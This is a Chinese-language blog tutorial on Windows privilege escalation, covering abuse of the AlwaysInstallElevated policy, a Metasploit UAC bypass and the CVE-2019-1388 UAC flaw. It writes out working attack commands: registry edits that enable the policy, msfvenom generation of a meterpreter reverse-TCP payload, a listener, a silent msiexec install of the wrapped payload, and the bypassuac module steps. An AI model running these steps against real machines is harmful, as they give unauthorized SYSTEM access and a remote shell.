Windows系统提权(二)

已于 2023-08-18 11:06:05 修改
阅读量308 收藏
点赞数 1
文章标签: windows
于 2023-08-18 10:50:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51151498/article/details/132309932
版权

Windows系统服务漏洞

Always Install Elevated-总是以高权限安装

AlwaysInstallElevated是一个策略设置,当在系统中使用Windows Installer安装任何程序时,该参数允许非特权用户以system权限运行MSI文件。如果目标系统上启用了这一设置,我们可以使用msf生成msi文件来以system权限执行任意payload。

MSI:Microsoft Silent Installer,是微软的安装包格式,它在后台运行.exe安装程序

利用条件

首先我们运行下列命令查看是否会收到AlwaysInstallElevated REG_DWORD 0x1的提示,如果有此提示,则代表此系统开启了总是以高权限安装的功能。

reg query HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

#如果没有注册表项的话,那就代表没有开启,反之显示0x1则代表开启

#如果未开启可以手动进行开启
reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
 

通过gpedit.msc开启

#本地组策略编辑器(gpedit.msc)只有在Windows专业版,企业版或者服务器版本中才会存在

开始提权

1.下载exemsi

MSI_Wrapper

2.msf生成exe程序

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=your-ip LPORT=8889 -f exe -o tim.exe

3.开启侦听

handler -H your-ip -P 8889 -p windows/x64/meterpreter/reverse_tcp

4.MSI_Wrapper生成安装包,然后将生成的安装包传入目标机器进行运行

 

 点击下一步

 到此页面,点击创建

 选择否

 桌面出现  

5.上传目标机器,并执行命令

msiexec /quiet /qn /i tim.msi

MSF收到会话

 getuid  查看权限

成功提权

 Windows UAC 提权

什么是UAC?

UAC(User Account Control)简称用户帐户控制,UAC 是Windows Vista以上的版本中引入了要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,提供权限或管理员‌密码。

一、利用Metasploit绕过UAC提权

攻击机:Kali

目标机:Windows7 旗舰版

1.MSF生成payload

木马上传目标机器

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=yourip lport=8899 -f exe -o wind.exe

2.MSF开启侦听

handler -H 192.168.xx.xx -P 8899 -p windows/x64/meterpreter/reverse_tcp

3.收到会话,提升权限

出现报错

 4.exploit/windows/local/bypassuac模块绕过UAC

该模块会创建一个可执行文件,目标机器会运行一个发起提升权限请求的程序,提示用户是否要继续运行,如果用户选择继续运行此模块通过进程注入利用受信任的发布者证书绕过Windows UAC,使用该模块时当前用户必须在管理员组中,且UAC必须为默认设置(“仅在程序试图更改我的计算机时提醒我”)。

background  #将会话放到后台

use exploit/windows/local/bypassuac

set session 3

set lhost Your-ip

set lport 6699

exploit

 获得system权限

二、利用CVE-2019-1388绕过UAC提权

       该漏洞位于Windows的UAC(User Account Control,用户帐户控制)机制中。默认情况下,Windows会在一个单独的桌面上显示所有的UAC提示——Secure Desktop。这些提示是由名为consent.exe的可执行文件产生的,该可执行文件以NT AUTHORITY\SYSTEM权限运行,完整性级别为System。

工具地址: GitHub - jas502n/CVE-2019-1388: CVE-2019-1388 UAC提权 (nt authority\system)

 HHUPD

 初始权限

1.点击运行HHUPD

 2.选择颁发者

3.等待浏览器运行连接,点击页面-另存为

4.出现报错,点击确定

5.填写文件名,保存

C:\Windows\System32\*.*

6.出现了第二个界面,找到cmd打开,查看权限,已经获得system权限

参考:

https://www.cnblogs.com/ZYX-bk-412/p/14747042.html

 ...

- Time
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows提权---第三方软件提权、Bypass UAC提权
qq_40012781的博客
07-03 1811
第三方软件提权、Bypass UAC提权
AlwaysInstallElevated提权介绍
bring_coco的博客
01-28 1309
介绍:AlwaysInstallElevated是注册表的一个键值,当其值为1时候,普通用户可以system权限安装MSI文件 一.判断AlwaysInstallElevated状态 1.通过PowerUp判断 可以使用PowerUP的Get-RegistryAlwaysInstallElevated模块来检查注册表项是否被设置,如果AlwaysInstallElevated注册表项被设置,意味着MSI文件是以SYSTEM权限运行的,True表示已经设置 命令:PowerShell -nop -exec b
利用AlwaysInstallElevated提权
热门推荐
Shanfenglan's blog
11-11 10万+
CATALOG前言利用过程1.判断是否激活alwaysinstallelevated1.1通过powerup判断1.2通过注册表的键值判断2.激活AlwaysInstallElevated3.提权4.防御方式5.参考文章 前言 AlwaysInstallElevated是注册表的一个键值,当其值为1的时候,普通用户即可以system权限安装msi程序。 利用过程 1.判断是否激活alwaysinstallelevated 1.1通过powerup判断 下载powerup certutil.exe -u
注册表键AlwaysInstall提权
yangbz123的博客
05-23 657
目录漏洞描述1.1Windows install概述1.2注册表键AlwaysInstallElevated概述漏洞原因1、没有获取meterpreter的情况下2、获取meterpreter的情况下2.1msf提权2.1msi安装文件提权参考文献 漏洞描述 1.1Windows install概述 微软Windows Installer作为Win2K/WinXP/WinVista的组件之一,是专门用来管理和配置软件服务的工具。作为额外的产品提供,允许用户有效地安装与配置软件产品与应用程序。 Install
Windows最最最常见的几种提权方法
2301_80115097的博客
12-12 897
Windows SMB 服务器特权提升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞,成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。提权,提高自己在服务器中的权限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限,通常提权是把普通用户的权限提升到管理员权限或者系统权限。要利用此漏洞,攻击者首先必须登录到系统
Windows系统常见提权方式
m0_64481831的博客
03-26 1400
提权依然要查看一些条件,最简单的办法就是直接尝试提权,能成功就成功,因为现实的环境都是很复杂的。
windows server 2003 系统提权
08-09
windows server 2003 系统提权 课程名称:《系统提权》 【要求】 对Windows Server2003操作系统MS08_067、MS03_026漏洞进行提权渗透测试; 对MS03_026漏洞开启远程桌面服务; 操作过程可自由发挥; 概念越详细越好...
windows账户提权 API.zip
01-22
标题"windows账户提权 API.zip"暗示了这个压缩包包含与Windows系统中利用API进行账户提权相关的资料。描述进一步证实了这一点,没有提供具体细节,但我们可以推断内容可能涉及通过API调用来提升账户权限的技术。 ...
Windows,Linux等系统提权工具
01-20
系统提权
windows系统提权工具.zip
12-25
windows7,windows2003等系统提权工具,psexec.exe程序可以实现windows7和2003的提权,whoami可以在win7上查看当前用户,pinjector是一个进程注入工具,procexp是一个手动查杀病毒的工具可以用来找到被进程注入的...
windows7提权
04-26
Windows 7操作系统中,"提权...总结来说,Windows 7提权是一个涉及系统安全与便利性的过程。了解如何正确、安全地提权,对于系统管理员和开发者来说至关重要。在实际操作中,要遵循最小权限原则,避免不必要的风险。
windows全部启动项
Named1ess
01-06 731
Windows全部启动项注册表
PathsAlwaysInstallElevated漏洞利用
MSB_WLAQ的博客
09-30 207
注册表键AlwaysInstallElevated 如果启用此策略设置项,那么任何权限的用户都能以NT AUTHORITY\SYSTEM权限来安装恶意的MSI(Micrisoft Windows Installer)文件。 1、PathsAlwaysInstallElevated漏洞产生的原因 原因是用户开启了Windows Installer特权安装功能。Windows Installer是Windows操作系统的组件之一,专门用来管理和配置软件服务,windows Installer除了是一个安装
AlwaysInstallElevated提权演示
bring_coco的博客
01-28 312
环境:kali Win7 1.打开win7先进行注册表的修改 命令:reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1 Reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DW
【入门基础】java泛型和通配符详解
杰叔叔不是个好叔叔的博客
07-19 734
Java泛型(Generics)是JDK 5中引入的一个新特性,它提供了编译时类型安全检测机制,允许程序员在编译时检测到非法的类型。泛型的主要目的是在编译期间对类型进行检查,使得类型错误能在编译时而不是运行时被捕获,从而提高程序的稳定性和安全性。同时,它也消除了类型转换的代码,使得代码更加简洁和易于维护。需要注意的是,上述非主流用法并非推荐的做法,它们可能增加代码的复杂性和出错的风险。在大多数情况下,应优先考虑使用泛型和通配符的主流用法来编写清晰、简洁、易于维护的代码。
Python list comprehension (列表推导式 - 列表解析式 - 列表生成式)
既然选择了远方 便只顾风雨兼程 - 永强
07-20 766
Python list comprehension (列表推导式 - 列表解析式 - 列表生成式)
Java在for循环中修改集合
java_t_t的博客
07-21 746
尽量不要在遍历中修改集合本身(修改集合中的元素的属性没问题),除非你能明确知道该操作导致的后果。如果需要在循环中移除元素,可以使用迭代器iterator。
SpringBoot源码(1)ApplicationContext和BeanFactory
weixin_43823462的博客
07-21 816
SpringBoot源码之ApplicationContext和BeanFactory
百日筑基第十七天-Java8 stream流常用操作
最新发布
qq_45477639的博客
07-21 822
除了使用Collectors提供了toMap,toList等方法之外,我们还可以自定义Collection的数据结构收集//用LinkedList收集//用TreeSet收集。
windows系统提权的方法
05-31
Windows系统提权攻击是指攻击者利用Windows系统中的漏洞或者配置不当来提升自己的权限,从而获得系统的完全控制。下面列举几种常见的Windows系统提权攻击方法: 1. 利用系统漏洞:攻击者可以利用Windows系统中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值